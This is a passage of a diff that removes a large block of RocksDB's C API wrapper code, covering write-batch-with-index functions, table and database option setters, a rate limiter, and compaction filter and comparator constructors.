-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep->DeleteRange(column_family->rep,
-                     SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_put_log_data(
-    rocksdb_writebatch_wi_t* b,
-    const char* blob, size_t len) {
-  b->rep->PutLogData(Slice(blob, len));
-}
-
-void rocksdb_writebatch_wi_iterate(
-    rocksdb_writebatch_wi_t* b,
-    void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen)) {
-  class H : public WriteBatch::Handler {
-   public:
-    void* state_;
-    void (*put_)(void*, const char* k, size_t klen, const char* v, size_t vlen);
-    void (*deleted_)(void*, const char* k, size_t klen);
-    virtual void Put(const Slice& key, const Slice& value) override {
-      (*put_)(state_, key.data(), key.size(), value.data(), value.size());
-    }
-    virtual void Delete(const Slice& key) override {
-      (*deleted_)(state_, key.data(), key.size());
-    }
-  };
-  H handler;
-  handler.state_ = state;
-  handler.put_ = put;
-  handler.deleted_ = deleted;
-  b->rep->GetWriteBatch()->Iterate(&handler);
-}
-
-const char* rocksdb_writebatch_wi_data(rocksdb_writebatch_wi_t* b, size_t* size) {
-  WriteBatch* wb = b->rep->GetWriteBatch();
-  *size = wb->GetDataSize();
-  return wb->Data().c_str();
-}
-
-void rocksdb_writebatch_wi_set_save_point(rocksdb_writebatch_wi_t* b) {
-  b->rep->SetSavePoint();
-}
-
-void rocksdb_writebatch_wi_rollback_to_save_point(rocksdb_writebatch_wi_t* b,
-                                               char** errptr) {
-  SaveError(errptr, b->rep->RollbackToSavePoint());
-}
-
-rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = wbwi->rep->NewIteratorWithBase(base_iterator->rep);
-  delete base_iterator;
-  return result;
-}
-
-rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator,
-    rocksdb_column_family_handle_t* column_family) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = wbwi->rep->NewIteratorWithBase(column_family->rep, base_iterator->rep);
-  delete base_iterator;
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatch(options->rep, Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatch(column_family->rep, options->rep,
-      Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch_and_db(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatchAndDB(db->rep, options->rep, Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_writebatch_wi_get_from_batch_and_db_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = wbwi->rep->GetFromBatchAndDB(db->rep, options->rep, column_family->rep,
-      Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-void rocksdb_write_writebatch_wi(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_wi_t* wbwi,
-    char** errptr) {
-  WriteBatch* wb = wbwi->rep->GetWriteBatch();
-  SaveError(errptr, db->rep->Write(options->rep, wb));
-}
-
-rocksdb_block_based_table_options_t*
-rocksdb_block_based_options_create() {
-  return new rocksdb_block_based_table_options_t;
-}
-
-void rocksdb_block_based_options_destroy(
-    rocksdb_block_based_table_options_t* options) {
-  delete options;
-}
-
-void rocksdb_block_based_options_set_block_size(
-    rocksdb_block_based_table_options_t* options, size_t block_size) {
-  options->rep.block_size = block_size;
-}
-
-void rocksdb_block_based_options_set_block_size_deviation(
-    rocksdb_block_based_table_options_t* options, int block_size_deviation) {
-  options->rep.block_size_deviation = block_size_deviation;
-}
-
-void rocksdb_block_based_options_set_block_restart_interval(
-    rocksdb_block_based_table_options_t* options, int block_restart_interval) {
-  options->rep.block_restart_interval = block_restart_interval;
-}
-
-void rocksdb_block_based_options_set_filter_policy(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_filterpolicy_t* filter_policy) {
-  options->rep.filter_policy.reset(filter_policy);
-}
-
-void rocksdb_block_based_options_set_no_block_cache(
-    rocksdb_block_based_table_options_t* options,
-    unsigned char no_block_cache) {
-  options->rep.no_block_cache = no_block_cache;
-}
-
-void rocksdb_block_based_options_set_block_cache(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_cache_t* block_cache) {
-  if (block_cache) {
-    options->rep.block_cache = block_cache->rep;
-  }
-}
-
-void rocksdb_block_based_options_set_block_cache_compressed(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_cache_t* block_cache_compressed) {
-  if (block_cache_compressed) {
-    options->rep.block_cache_compressed = block_cache_compressed->rep;
-  }
-}
-
-void rocksdb_block_based_options_set_whole_key_filtering(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.whole_key_filtering = v;
-}
-
-void rocksdb_block_based_options_set_format_version(
-    rocksdb_block_based_table_options_t* options, int v) {
-  options->rep.format_version = v;
-}
-
-void rocksdb_block_based_options_set_index_type(
-    rocksdb_block_based_table_options_t* options, int v) {
-  options->rep.index_type = static_cast<BlockBasedTableOptions::IndexType>(v);
-}
-
-void rocksdb_block_based_options_set_hash_index_allow_collision(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.hash_index_allow_collision = v;
-}
-
-void rocksdb_block_based_options_set_cache_index_and_filter_blocks(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.cache_index_and_filter_blocks = v;
-}
-
-void rocksdb_block_based_options_set_pin_l0_filter_and_index_blocks_in_cache(
-    rocksdb_block_based_table_options_t* options, unsigned char v) {
-  options->rep.pin_l0_filter_and_index_blocks_in_cache = v;
-}
-
-void rocksdb_options_set_block_based_table_factory(
-    rocksdb_options_t *opt,
-    rocksdb_block_based_table_options_t* table_options) {
-  if (table_options) {
-    opt->rep.table_factory.reset(
-        rocksdb::NewBlockBasedTableFactory(table_options->rep));
-  }
-}
-
-
-rocksdb_cuckoo_table_options_t*
-rocksdb_cuckoo_options_create() {
-  return new rocksdb_cuckoo_table_options_t;
-}
-
-void rocksdb_cuckoo_options_destroy(
-    rocksdb_cuckoo_table_options_t* options) {
-  delete options;
-}
-
-void rocksdb_cuckoo_options_set_hash_ratio(
-    rocksdb_cuckoo_table_options_t* options, double v) {
-  options->rep.hash_table_ratio = v;
-}
-
-void rocksdb_cuckoo_options_set_max_search_depth(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v) {
-  options->rep.max_search_depth = v;
-}
-
-void rocksdb_cuckoo_options_set_cuckoo_block_size(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v) {
-  options->rep.cuckoo_block_size = v;
-}
-
-void rocksdb_cuckoo_options_set_identity_as_first_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v) {
-  options->rep.identity_as_first_hash = v;
-}
-
-void rocksdb_cuckoo_options_set_use_module_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v) {
-  options->rep.use_module_hash = v;
-}
-
-void rocksdb_options_set_cuckoo_table_factory(
-    rocksdb_options_t *opt,
-    rocksdb_cuckoo_table_options_t* table_options) {
-  if (table_options) {
-    opt->rep.table_factory.reset(
-        rocksdb::NewCuckooTableFactory(table_options->rep));
-  }
-}
-
-void rocksdb_set_options(
-    rocksdb_t* db, int count, const char* const keys[], const char* const values[], char** errptr) {
-        std::unordered_map<std::string, std::string> options_map;
-        for (int i=0; i<count; i++)
-            options_map[keys[i]] = values[i];
-        SaveError(errptr,
-            db->rep->SetOptions(options_map));
-    }
-
-rocksdb_options_t* rocksdb_options_create() {
-  return new rocksdb_options_t;
-}
-
-void rocksdb_options_destroy(rocksdb_options_t* options) {
-  delete options;
-}
-
-void rocksdb_options_increase_parallelism(
-    rocksdb_options_t* opt, int total_threads) {
-  opt->rep.IncreaseParallelism(total_threads);
-}
-
-void rocksdb_options_optimize_for_point_lookup(
-    rocksdb_options_t* opt, uint64_t block_cache_size_mb) {
-  opt->rep.OptimizeForPointLookup(block_cache_size_mb);
-}
-
-void rocksdb_options_optimize_level_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget) {
-  opt->rep.OptimizeLevelStyleCompaction(memtable_memory_budget);
-}
-
-void rocksdb_options_optimize_universal_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget) {
-  opt->rep.OptimizeUniversalStyleCompaction(memtable_memory_budget);
-}
-
-void rocksdb_options_set_compaction_filter(
-    rocksdb_options_t* opt,
-    rocksdb_compactionfilter_t* filter) {
-  opt->rep.compaction_filter = filter;
-}
-
-void rocksdb_options_set_compaction_filter_factory(
-    rocksdb_options_t* opt, rocksdb_compactionfilterfactory_t* factory) {
-  opt->rep.compaction_filter_factory =
-      std::shared_ptr<CompactionFilterFactory>(factory);
-}
-
-void rocksdb_options_compaction_readahead_size(
-    rocksdb_options_t* opt, size_t s) {
-  opt->rep.compaction_readahead_size = s;
-}
-
-void rocksdb_options_set_comparator(
-    rocksdb_options_t* opt,
-    rocksdb_comparator_t* cmp) {
-  opt->rep.comparator = cmp;
-}
-
-void rocksdb_options_set_merge_operator(
-    rocksdb_options_t* opt,
-    rocksdb_mergeoperator_t* merge_operator) {
-  opt->rep.merge_operator = std::shared_ptr<MergeOperator>(merge_operator);
-}
-
-
-void rocksdb_options_set_create_if_missing(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.create_if_missing = v;
-}
-
-void rocksdb_options_set_create_missing_column_families(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.create_missing_column_families = v;
-}
-
-void rocksdb_options_set_error_if_exists(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.error_if_exists = v;
-}
-
-void rocksdb_options_set_paranoid_checks(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.paranoid_checks = v;
-}
-
-void rocksdb_options_set_db_paths(rocksdb_options_t* opt, 
-                                  const rocksdb_dbpath_t** dbpath_values, 
-                                  size_t num_paths) {
-  std::vector<DbPath> db_paths(num_paths);
-  for (size_t i = 0; i < num_paths; ++i) {
-    db_paths[i] = dbpath_values[i]->rep;
-  }
-  opt->rep.db_paths = db_paths;
-}
-
-void rocksdb_options_set_env(rocksdb_options_t* opt, rocksdb_env_t* env) {
-  opt->rep.env = (env ? env->rep : nullptr);
-}
-
-void rocksdb_options_set_info_log(rocksdb_options_t* opt, rocksdb_logger_t* l) {
-  if (l) {
-    opt->rep.info_log = l->rep;
-  }
-}
-
-void rocksdb_options_set_info_log_level(
-    rocksdb_options_t* opt, int v) {
-  opt->rep.info_log_level = static_cast<InfoLogLevel>(v);
-}
-
-void rocksdb_options_set_db_write_buffer_size(rocksdb_options_t* opt,
-                                              size_t s) {
-  opt->rep.db_write_buffer_size = s;
-}
-
-void rocksdb_options_set_write_buffer_size(rocksdb_options_t* opt, size_t s) {
-  opt->rep.write_buffer_size = s;
-}
-
-void rocksdb_options_set_max_open_files(rocksdb_options_t* opt, int n) {
-  opt->rep.max_open_files = n;
-}
-
-void rocksdb_options_set_max_file_opening_threads(rocksdb_options_t* opt, int n) {
-  opt->rep.max_file_opening_threads = n;
-}
-
-void rocksdb_options_set_max_total_wal_size(rocksdb_options_t* opt, uint64_t n) {
-  opt->rep.max_total_wal_size = n;
-}
-
-void rocksdb_options_set_target_file_size_base(
-    rocksdb_options_t* opt, uint64_t n) {
-  opt->rep.target_file_size_base = n;
-}
-
-void rocksdb_options_set_target_file_size_multiplier(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.target_file_size_multiplier = n;
-}
-
-void rocksdb_options_set_max_bytes_for_level_base(
-    rocksdb_options_t* opt, uint64_t n) {
-  opt->rep.max_bytes_for_level_base = n;
-}
-
-void rocksdb_options_set_level_compaction_dynamic_level_bytes(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.level_compaction_dynamic_level_bytes = v;
-}
-
-void rocksdb_options_set_max_bytes_for_level_multiplier(rocksdb_options_t* opt,
-                                                        double n) {
-  opt->rep.max_bytes_for_level_multiplier = n;
-}
-
-void rocksdb_options_set_max_compaction_bytes(rocksdb_options_t* opt,
-                                              uint64_t n) {
-  opt->rep.max_compaction_bytes = n;
-}
-
-void rocksdb_options_set_max_bytes_for_level_multiplier_additional(
-    rocksdb_options_t* opt, int* level_values, size_t num_levels) {
-  opt->rep.max_bytes_for_level_multiplier_additional.resize(num_levels);
-  for (size_t i = 0; i < num_levels; ++i) {
-    opt->rep.max_bytes_for_level_multiplier_additional[i] = level_values[i];
-  }
-}
-
-void rocksdb_options_enable_statistics(rocksdb_options_t* opt) {
-  opt->rep.statistics = rocksdb::CreateDBStatistics();
-}
-
-void rocksdb_options_set_skip_stats_update_on_db_open(rocksdb_options_t* opt, unsigned char val) {
-  opt->rep.skip_stats_update_on_db_open = val;
-}
-
-void rocksdb_options_set_num_levels(rocksdb_options_t* opt, int n) {
-  opt->rep.num_levels = n;
-}
-
-void rocksdb_options_set_level0_file_num_compaction_trigger(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.level0_file_num_compaction_trigger = n;
-}
-
-void rocksdb_options_set_level0_slowdown_writes_trigger(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.level0_slowdown_writes_trigger = n;
-}
-
-void rocksdb_options_set_level0_stop_writes_trigger(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.level0_stop_writes_trigger = n;
-}
-
-void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* opt,
-                                                  int n) {}
-
-void rocksdb_options_set_wal_recovery_mode(rocksdb_options_t* opt,int mode) {
-  opt->rep.wal_recovery_mode = static_cast<WALRecoveryMode>(mode);
-}
-
-void rocksdb_options_set_compression(rocksdb_options_t* opt, int t) {
-  opt->rep.compression = static_cast<CompressionType>(t);
-}
-
-void rocksdb_options_set_compression_per_level(rocksdb_options_t* opt,
-                                               int* level_values,
-                                               size_t num_levels) {
-  opt->rep.compression_per_level.resize(num_levels);
-  for (size_t i = 0; i < num_levels; ++i) {
-    opt->rep.compression_per_level[i] =
-      static_cast<CompressionType>(level_values[i]);
-  }
-}
-
-void rocksdb_options_set_compression_options(rocksdb_options_t* opt, int w_bits,
-                                             int level, int strategy,
-                                             int max_dict_bytes) {
-  opt->rep.compression_opts.window_bits = w_bits;
-  opt->rep.compression_opts.level = level;
-  opt->rep.compression_opts.strategy = strategy;
-  opt->rep.compression_opts.max_dict_bytes = max_dict_bytes;
-}
-
-void rocksdb_options_set_prefix_extractor(
-    rocksdb_options_t* opt, rocksdb_slicetransform_t* prefix_extractor) {
-  opt->rep.prefix_extractor.reset(prefix_extractor);
-}
-
-void rocksdb_options_set_use_fsync(
-    rocksdb_options_t* opt, int use_fsync) {
-  opt->rep.use_fsync = use_fsync;
-}
-
-void rocksdb_options_set_db_log_dir(
-    rocksdb_options_t* opt, const char* db_log_dir) {
-  opt->rep.db_log_dir = db_log_dir;
-}
-
-void rocksdb_options_set_wal_dir(
-    rocksdb_options_t* opt, const char* v) {
-  opt->rep.wal_dir = v;
-}
-
-void rocksdb_options_set_WAL_ttl_seconds(rocksdb_options_t* opt, uint64_t ttl) {
-  opt->rep.WAL_ttl_seconds = ttl;
-}
-
-void rocksdb_options_set_WAL_size_limit_MB(
-    rocksdb_options_t* opt, uint64_t limit) {
-  opt->rep.WAL_size_limit_MB = limit;
-}
-
-void rocksdb_options_set_manifest_preallocation_size(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.manifest_preallocation_size = v;
-}
-
-// noop
-void rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t* opt,
-                                                         unsigned char v) {}
-
-void rocksdb_options_set_use_direct_reads(rocksdb_options_t* opt,
-                                          unsigned char v) {
-  opt->rep.use_direct_reads = v;
-}
-
-void rocksdb_options_set_use_direct_io_for_flush_and_compaction(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.use_direct_io_for_flush_and_compaction = v;
-}
-
-void rocksdb_options_set_allow_mmap_reads(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.allow_mmap_reads = v;
-}
-
-void rocksdb_options_set_allow_mmap_writes(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.allow_mmap_writes = v;
-}
-
-void rocksdb_options_set_is_fd_close_on_exec(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.is_fd_close_on_exec = v;
-}
-
-void rocksdb_options_set_skip_log_error_on_recovery(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.skip_log_error_on_recovery = v;
-}
-
-void rocksdb_options_set_stats_dump_period_sec(
-    rocksdb_options_t* opt, unsigned int v) {
-  opt->rep.stats_dump_period_sec = v;
-}
-
-void rocksdb_options_set_advise_random_on_open(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.advise_random_on_open = v;
-}
-
-void rocksdb_options_set_access_hint_on_compaction_start(
-    rocksdb_options_t* opt, int v) {
-  switch(v) {
-    case 0:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::NONE;
-      break;
-    case 1:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::NORMAL;
-      break;
-    case 2:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::SEQUENTIAL;
-      break;
-    case 3:
-      opt->rep.access_hint_on_compaction_start = rocksdb::Options::WILLNEED;
-      break;
-  }
-}
-
-void rocksdb_options_set_use_adaptive_mutex(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.use_adaptive_mutex = v;
-}
-
-void rocksdb_options_set_bytes_per_sync(
-    rocksdb_options_t* opt, uint64_t v) {
-  opt->rep.bytes_per_sync = v;
-}
-
-void rocksdb_options_set_allow_concurrent_memtable_write(rocksdb_options_t* opt,
-                                                         unsigned char v) {
-  opt->rep.allow_concurrent_memtable_write = v;
-}
-
-void rocksdb_options_set_enable_write_thread_adaptive_yield(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.enable_write_thread_adaptive_yield = v;
-}
-
-void rocksdb_options_set_max_sequential_skip_in_iterations(
-    rocksdb_options_t* opt, uint64_t v) {
-  opt->rep.max_sequential_skip_in_iterations = v;
-}
-
-void rocksdb_options_set_max_write_buffer_number(rocksdb_options_t* opt, int n) {
-  opt->rep.max_write_buffer_number = n;
-}
-
-void rocksdb_options_set_min_write_buffer_number_to_merge(rocksdb_options_t* opt, int n) {
-  opt->rep.min_write_buffer_number_to_merge = n;
-}
-
-void rocksdb_options_set_max_write_buffer_number_to_maintain(
-    rocksdb_options_t* opt, int n) {
-  opt->rep.max_write_buffer_number_to_maintain = n;
-}
-
-void rocksdb_options_set_max_background_compactions(rocksdb_options_t* opt, int n) {
-  opt->rep.max_background_compactions = n;
-}
-
-void rocksdb_options_set_base_background_compactions(rocksdb_options_t* opt,
-                                                     int n) {
-  opt->rep.base_background_compactions = n;
-}
-
-void rocksdb_options_set_max_background_flushes(rocksdb_options_t* opt, int n) {
-  opt->rep.max_background_flushes = n;
-}
-
-void rocksdb_options_set_max_log_file_size(rocksdb_options_t* opt, size_t v) {
-  opt->rep.max_log_file_size = v;
-}
-
-void rocksdb_options_set_log_file_time_to_roll(rocksdb_options_t* opt, size_t v) {
-  opt->rep.log_file_time_to_roll = v;
-}
-
-void rocksdb_options_set_keep_log_file_num(rocksdb_options_t* opt, size_t v) {
-  opt->rep.keep_log_file_num = v;
-}
-
-void rocksdb_options_set_recycle_log_file_num(rocksdb_options_t* opt,
-                                              size_t v) {
-  opt->rep.recycle_log_file_num = v;
-}
-
-void rocksdb_options_set_soft_rate_limit(rocksdb_options_t* opt, double v) {
-  opt->rep.soft_rate_limit = v;
-}
-
-void rocksdb_options_set_hard_rate_limit(rocksdb_options_t* opt, double v) {
-  opt->rep.hard_rate_limit = v;
-}
-
-void rocksdb_options_set_soft_pending_compaction_bytes_limit(rocksdb_options_t* opt, size_t v) {
-  opt->rep.soft_pending_compaction_bytes_limit = v;
-}
-
-void rocksdb_options_set_hard_pending_compaction_bytes_limit(rocksdb_options_t* opt, size_t v) {
-  opt->rep.hard_pending_compaction_bytes_limit = v;
-}
-
-void rocksdb_options_set_rate_limit_delay_max_milliseconds(
-    rocksdb_options_t* opt, unsigned int v) {
-  opt->rep.rate_limit_delay_max_milliseconds = v;
-}
-
-void rocksdb_options_set_max_manifest_file_size(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.max_manifest_file_size = v;
-}
-
-void rocksdb_options_set_table_cache_numshardbits(
-    rocksdb_options_t* opt, int v) {
-  opt->rep.table_cache_numshardbits = v;
-}
-
-void rocksdb_options_set_table_cache_remove_scan_count_limit(
-    rocksdb_options_t* opt, int v) {
-  // this option is deprecated
-}
-
-void rocksdb_options_set_arena_block_size(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.arena_block_size = v;
-}
-
-void rocksdb_options_set_disable_auto_compactions(rocksdb_options_t* opt, int disable) {
-  opt->rep.disable_auto_compactions = disable;
-}
-
-void rocksdb_options_set_optimize_filters_for_hits(rocksdb_options_t* opt, int v) {
-  opt->rep.optimize_filters_for_hits = v;
-}
-
-void rocksdb_options_set_delete_obsolete_files_period_micros(
-    rocksdb_options_t* opt, uint64_t v) {
-  opt->rep.delete_obsolete_files_period_micros = v;
-}
-
-void rocksdb_options_prepare_for_bulk_load(rocksdb_options_t* opt) {
-  opt->rep.PrepareForBulkLoad();
-}
-
-void rocksdb_options_set_memtable_vector_rep(rocksdb_options_t *opt) {
-  opt->rep.memtable_factory.reset(new rocksdb::VectorRepFactory);
-}
-
-void rocksdb_options_set_memtable_prefix_bloom_size_ratio(
-    rocksdb_options_t* opt, double v) {
-  opt->rep.memtable_prefix_bloom_size_ratio = v;
-}
-
-void rocksdb_options_set_memtable_huge_page_size(rocksdb_options_t* opt,
-                                                 size_t v) {
-  opt->rep.memtable_huge_page_size = v;
-}
-
-void rocksdb_options_set_hash_skip_list_rep(
-    rocksdb_options_t *opt, size_t bucket_count,
-    int32_t skiplist_height, int32_t skiplist_branching_factor) {
-  rocksdb::MemTableRepFactory* factory = rocksdb::NewHashSkipListRepFactory(
-      bucket_count, skiplist_height, skiplist_branching_factor);
-  opt->rep.memtable_factory.reset(factory);
-}
-
-void rocksdb_options_set_hash_link_list_rep(
-    rocksdb_options_t *opt, size_t bucket_count) {
-  opt->rep.memtable_factory.reset(rocksdb::NewHashLinkListRepFactory(bucket_count));
-}
-
-void rocksdb_options_set_plain_table_factory(
-    rocksdb_options_t *opt, uint32_t user_key_len, int bloom_bits_per_key,
-    double hash_table_ratio, size_t index_sparseness) {
-  rocksdb::PlainTableOptions options;
-  options.user_key_len = user_key_len;
-  options.bloom_bits_per_key = bloom_bits_per_key;
-  options.hash_table_ratio = hash_table_ratio;
-  options.index_sparseness = index_sparseness;
-
-  rocksdb::TableFactory* factory = rocksdb::NewPlainTableFactory(options);
-  opt->rep.table_factory.reset(factory);
-}
-
-void rocksdb_options_set_max_successive_merges(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.max_successive_merges = v;
-}
-
-void rocksdb_options_set_bloom_locality(
-    rocksdb_options_t* opt, uint32_t v) {
-  opt->rep.bloom_locality = v;
-}
-
-void rocksdb_options_set_inplace_update_support(
-    rocksdb_options_t* opt, unsigned char v) {
-  opt->rep.inplace_update_support = v;
-}
-
-void rocksdb_options_set_inplace_update_num_locks(
-    rocksdb_options_t* opt, size_t v) {
-  opt->rep.inplace_update_num_locks = v;
-}
-
-void rocksdb_options_set_report_bg_io_stats(
-    rocksdb_options_t* opt, int v) {
-  opt->rep.report_bg_io_stats = v;
-}
-
-void rocksdb_options_set_compaction_style(rocksdb_options_t *opt, int style) {
-  opt->rep.compaction_style = static_cast<rocksdb::CompactionStyle>(style);
-}
-
-void rocksdb_options_set_universal_compaction_options(rocksdb_options_t *opt, rocksdb_universal_compaction_options_t *uco) {
-  opt->rep.compaction_options_universal = *(uco->rep);
-}
-
-void rocksdb_options_set_fifo_compaction_options(
-    rocksdb_options_t* opt,
-    rocksdb_fifo_compaction_options_t* fifo) {
-  opt->rep.compaction_options_fifo = fifo->rep;
-}
-
-char *rocksdb_options_statistics_get_string(rocksdb_options_t *opt) {
-  rocksdb::Statistics *statistics = opt->rep.statistics.get();
-  if (statistics) {
-    return strdup(statistics->ToString().c_str());
-  }
-  return nullptr;
-}
-
-void rocksdb_options_set_ratelimiter(rocksdb_options_t *opt, rocksdb_ratelimiter_t *limiter) {
-  opt->rep.rate_limiter.reset(limiter->rep);
-  limiter->rep = nullptr;
-}
-
-rocksdb_ratelimiter_t* rocksdb_ratelimiter_create(
-    int64_t rate_bytes_per_sec,
-    int64_t refill_period_us,
-    int32_t fairness) {
-  rocksdb_ratelimiter_t* rate_limiter = new rocksdb_ratelimiter_t;
-  rate_limiter->rep = NewGenericRateLimiter(rate_bytes_per_sec,
-                                            refill_period_us, fairness);
-  return rate_limiter;
-}
-
-void rocksdb_ratelimiter_destroy(rocksdb_ratelimiter_t *limiter) {
-  if (limiter->rep) {
-    delete limiter->rep;
-  }
-  delete limiter;
-}
-
-/*
-TODO:
-DB::OpenForReadOnly
-DB::KeyMayExist
-DB::GetOptions
-DB::GetSortedWalFiles
-DB::GetLatestSequenceNumber
-DB::GetUpdatesSince
-DB::GetDbIdentity
-DB::RunManualCompaction
-custom cache
-table_properties_collectors
-*/
-
-rocksdb_compactionfilter_t* rocksdb_compactionfilter_create(
-    void* state,
-    void (*destructor)(void*),
-    unsigned char (*filter)(
-        void*,
-        int level,
-        const char* key, size_t key_length,
-        const char* existing_value, size_t value_length,
-        char** new_value, size_t *new_value_length,
-        unsigned char* value_changed),
-    const char* (*name)(void*)) {
-  rocksdb_compactionfilter_t* result = new rocksdb_compactionfilter_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->filter_ = filter;
-  result->ignore_snapshots_ = false;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_compactionfilter_set_ignore_snapshots(
-  rocksdb_compactionfilter_t* filter,
-  unsigned char whether_ignore) {
-  filter->ignore_snapshots_ = whether_ignore;
-}
-
-void rocksdb_compactionfilter_destroy(rocksdb_compactionfilter_t* filter) {
-  delete filter;
-}
-
-unsigned char rocksdb_compactionfiltercontext_is_full_compaction(
-    rocksdb_compactionfiltercontext_t* context) {
-  return context->rep.is_full_compaction;
-}
-
-unsigned char rocksdb_compactionfiltercontext_is_manual_compaction(
-    rocksdb_compactionfiltercontext_t* context) {
-  return context->rep.is_manual_compaction;
-}
-
-rocksdb_compactionfilterfactory_t* rocksdb_compactionfilterfactory_create(
-    void* state, void (*destructor)(void*),
-    rocksdb_compactionfilter_t* (*create_compaction_filter)(
-        void*, rocksdb_compactionfiltercontext_t* context),
-    const char* (*name)(void*)) {
-  rocksdb_compactionfilterfactory_t* result =
-      new rocksdb_compactionfilterfactory_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->create_compaction_filter_ = create_compaction_filter;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_compactionfilterfactory_destroy(
-    rocksdb_compactionfilterfactory_t* factory) {
-  delete factory;
-}
-
-rocksdb_comparator_t* rocksdb_comparator_create(
-    void* state,
-    void (*destructor)(void*),
-    int (*compare)(
-        void*,
-        const char* a, size_t alen,
-        const char* b, size_t blen),
-    const char* (*name)(void*)) {
-  rocksdb_comparator_t* result = new rocksdb_comparator_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->compare_ = compare;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_comparator_destroy(rocksdb_comparator_t* cmp) {
-  delete cmp;
-}
-
